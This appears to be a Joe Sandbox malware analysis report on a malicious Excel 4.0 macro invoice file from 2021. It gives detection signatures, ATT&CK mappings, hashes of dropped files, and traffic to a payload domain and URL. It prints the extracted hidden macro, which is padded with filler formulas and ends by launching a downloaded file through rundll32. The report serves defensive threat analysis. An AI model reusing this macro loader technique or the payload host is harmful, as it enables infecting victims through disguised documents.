Analysis Report invoice_661434949_67552437.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Extra Window Memory Injection1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
12% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
indianoci.co.uk | 172.67.189.4 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | | unknown | ||
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.189.4 | indianoci.co.uk | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385000 |
Start date: | 11.04.2021 |
Start time: | 00:16:02 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | invoice_661434949_67552437.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 31 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSM@3/10@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
172.67.189.4 | Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
indianoci.co.uk | Get hash | malicious | Browse |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133926 |
Entropy (8bit): | 5.370325908538599 |
Encrypted: | false |
SSDEEP: | 1536:4cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:/VQ9DQW+zYXO8 |
MD5: | F6A5092BE9E143221D9DA187B89031EA |
SHA1: | DC0CFDABC3FF3BF9D2CAE81DC5DFE490B91BDABE |
SHA-256: | 8CE02001314F71667C5800F45F486B9222BB274972B541E59D5CF4B7B0D29FEA |
SHA-512: | 749633B47B754495E5BFB39C7691E2CCB210E54A2D3409AA58C42A30A31819BE34E91289457B69022717F5000C536928AA33B5D2DE74CBB1EA8195F619D8530D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 169558 |
Entropy (8bit): | 7.988183859518103 |
Encrypted: | false |
SSDEEP: | 3072:KTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGv:KrV4mnVqbTEnRMs |
MD5: | 2A06BF86C977F9A29739FD65CE53B5BE |
SHA1: | 33C88641A06413C919903497577EEA54ED03FAA0 |
SHA-256: | 4C18B1BFA7CD6C6048A5637FF7F753B78435E70FAB6BA74125EC7D633F7A3F9F |
SHA-512: | 71E29BE3A7A31A7650892A599C88C99CB25BF4B60DD6172BAAF849036562E3E141605543FCACD9389D73B04535C270543B0B4D55272809EEA6ABFB2E3764D2C8 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4318 |
Entropy (8bit): | 4.967209600318077 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1bwvJADh/pRsQsIszbGD:1j9jhjYjWK/lyH+kbwRADh/pmQsIsfGD |
MD5: | 16321A0C2074BEA9227884ABA9971E30 |
SHA1: | 886A39B9C36D5BA00DEDA1BD30792635C73FA4B0 |
SHA-256: | 7B2272F4480E7B05C23D52C6DABC5F37F36FA7BB48EA63A4FBB594FE5A024F60 |
SHA-512: | 6B42A1F453E3CDF224D88C9CEE397F91946108841DF7262C907C95CD7FE3A316FACB0F1F3E2684C918ACC9B37BD326608FB71FAC3E76DDB9014B3942CED1ADF5 |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://indianoci.co.uk/ufriends/support.php |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184339 |
Entropy (8bit): | 7.96536778671128 |
Encrypted: | false |
SSDEEP: | 3072:gNTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGkz:gNrV4mnVqbTEnRMZ |
MD5: | 8580314383DFD8A39447DD3C93CA33BC |
SHA1: | BAFCC418D47D7E430FF47609B964F5A1BE3444CE |
SHA-256: | AAAA75B73BC2C8AA4DCBAF7D804998C1B1AB0E9B0883B550EF8613D17C4AB148 |
SHA-512: | C0D1DB87605D1ACF0EEFDAD8B92672AD961822819D5294DCB96E6ABA06B008EABA86DB54D0461A07283B30E3E0C5BE26734DAE8FCB1D7D6DCFADF81C8BA92619 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.630447272354785 |
Encrypted: | false |
SSDEEP: | 12:8XMmYXUhuElPCH2A4WYJuh8+WrjAZ/2bDaLC5Lu4t2Y+xIBjKZm:8XRK4uEAZiDD87aB6m |
MD5: | 829291B2038D409B9270168201F7E941 |
SHA1: | DB171763DC332EDB4FD1C3D72F4616E26D880320 |
SHA-256: | 6F1978A9D5009A5046FEEEFB34C0B15272724281E3D091842B0F1F975D143A75 |
SHA-512: | 6B7672A3C849E23191E9D0436BD807CC08EA52C6291E4CEDB8A773E2D1E429AD6ECA7DC70A2B48B56798553ABB75B95D4B0A87E95083178EF5E3D0B1E7C22EC6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 148 |
Entropy (8bit): | 4.837648193517411 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWHnKb8W/g4dTSULE8W/g4dTSmxWHnKb8W/g4dTSv:dj0nKbNgQTpENgQTKnKbNgQTc |
MD5: | 0E1F08D229A4602AF5EEF4E92BABE78B |
SHA1: | 5BF6BE5FC7F62BF694A2AB180D0A2F3D30C4A91D |
SHA-256: | ED1F65A34CF8DF1B1EF2A4B5E3E6DFC5008EBF428F0B6AB5F333BC1B70A7B82E |
SHA-512: | 41C316D73CBF6499480436226DF3192394AF0D4DC53CBAA4E9C59AF7363DD27FE970E4C04B8176ED5333B7C021777B5D28B19E6BCB7B189B2D0DFD60129BBE14 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2280 |
Entropy (8bit): | 4.732266669477698 |
Encrypted: | false |
SSDEEP: | 48:8+eTwBB5aBwG5vB6p+eTwBB5aBwG5vB6:8d0BWBrBKd0BWBrB |
MD5: | 874ACF901353A710C040E3CD02659E57 |
SHA1: | 9AE90F147E97013FC045BE829756701F29962EB5 |
SHA-256: | 2702E0C79D524ED1DA7ECB6F2D80CC7E218957B0320CDF77DAB5ECC61668168F |
SHA-512: | 43994C67E28C42282D4E5688B0842DFF8827D72422BF11DC6653127748617C25DB95481F41F156EECCA0180CF0C0AF4D4F6D6CF9669E074EE379137862CC1010 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184330 |
Entropy (8bit): | 7.965430051359059 |
Encrypted: | false |
SSDEEP: | 3072:PNTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGkC:PNrV4mnVqbTEnRMU |
MD5: | 004C393BB1346D076AF52F46A4C8BCF1 |
SHA1: | A780758840385FAE166116047987157A7B5FF9F9 |
SHA-256: | 4B6B8F913401F4EE53D01D86D12844D6AB4AA77B27E3D120BB76B4BADB34D983 |
SHA-512: | A5B29DD8664B1B522865C1C6B6336626339A569A4E7DB362CCED6B950846D11B407345E988625B800E9C9A25B9842F3295069D3F2A04BFEEFCFE190E2D9801E2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 4318 |
Entropy (8bit): | 4.967209600318077 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1bwvJADh/pRsQsIszbGD:1j9jhjYjWK/lyH+kbwRADh/pmQsIsfGD |
MD5: | 16321A0C2074BEA9227884ABA9971E30 |
SHA1: | 886A39B9C36D5BA00DEDA1BD30792635C73FA4B0 |
SHA-256: | 7B2272F4480E7B05C23D52C6DABC5F37F36FA7BB48EA63A4FBB594FE5A024F60 |
SHA-512: | 6B42A1F453E3CDF224D88C9CEE397F91946108841DF7262C907C95CD7FE3A316FACB0F1F3E2684C918ACC9B37BD326608FB71FAC3E76DDB9014B3942CED1ADF5 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.965561623864126 |
TrID: |
|
File name: | invoice_661434949_67552437.xlsm |
File size: | 184803 |
MD5: | 64f33ccbc7976306417b2b2528daa5fe |
SHA1: | d71433580e83ab455556a88c483d1887e9641be6 |
SHA256: | 03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73 |
SHA512: | f111800a5f1de2d2cec569448810eefd8999c99d9e78d5414b3bc662dbb607131a7a69f7236c929b769347d3430c9090c1144a3946c6a2d3d1d7d84236940ecf |
SSDEEP: | 3072:eSnTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMG9m:eSnrV4mnVqbTEnRML |
File Content Preview: | PK..........!."..Z....f.......[Content_Types].xml ...(...... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "invoice_661434949_67552437.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,l,,l,..\GVer.iks,3"=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=EXEC(""rund""&G12&G13&G14&G15&"" ""&F14&"",StartW"")",,2,,=RETURN(),,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:16:55.747047901 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.775840044 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.775976896 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.776480913 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.805140018 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828572035 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828622103 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828656912 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:16:55.828701019 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.828766108 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:16:55.828777075 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:18:42.739722013 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
Apr 11, 2021 00:18:42.768620968 CEST | 80 | 49713 | 172.67.189.4 | 192.168.2.3 |
Apr 11, 2021 00:18:42.768901110 CEST | 49713 | 80 | 192.168.2.3 | 172.67.189.4 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:16:41.630199909 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:41.642940044 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:43.169007063 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:43.183543921 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:43.817776918 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:43.830389977 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:44.512424946 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:44.526330948 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:45.245145082 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:45.258902073 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:46.207685947 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:46.220434904 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:51.013355970 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:51.026460886 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:51.796119928 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:51.808504105 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:52.776112080 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:52.822726011 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:52.871478081 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:52.884902954 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:53.131850004 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:53.145723104 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:54.134819031 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:54.147749901 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:55.155042887 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:55.167969942 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:55.704058886 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:55.743108034 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:55.909338951 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:55.922063112 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:56.774822950 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:56.788069010 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:57.160152912 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:57.172883987 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:57.506046057 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:57.518795013 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:58.276417971 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:58.289179087 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:16:59.815046072 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:16:59.827958107 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:01.117827892 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:01.131715059 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:01.167803049 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:01.181021929 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:02.103447914 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:02.116221905 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:04.066437960 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:04.079101086 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:08.813133955 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:08.825639963 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:12.113722086 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:12.131546021 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:19.082400084 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:19.134360075 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:43.563807011 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:43.575984001 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:17:46.275264978 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:17:46.293052912 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:18:17.996232033 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:18:18.009129047 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:18:26.311083078 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:18:26.337780952 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:18:27.152786016 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:18:27.171003103 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:19:00.756851912 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:19:00.769555092 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Apr 11, 2021 00:19:00.947961092 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Apr 11, 2021 00:19:00.961838007 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 11, 2021 00:16:55.704058886 CEST | 192.168.2.3 | 8.8.8.8 | 0x50ed | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 11, 2021 00:16:55.743108034 CEST | 8.8.8.8 | 192.168.2.3 | 0x50ed | No error (0) | 172.67.189.4 | A (IP address) | IN (0x0001) |
Apr 11, 2021 00:16:55.743108034 CEST | 8.8.8.8 | 192.168.2.3 | 0x50ed | No error (0) | 104.21.43.238 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49713 | 172.67.189.4 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 11, 2021 00:16:55.776480913 CEST | 345 | OUT | |
Apr 11, 2021 00:16:55.828572035 CEST | 346 | IN |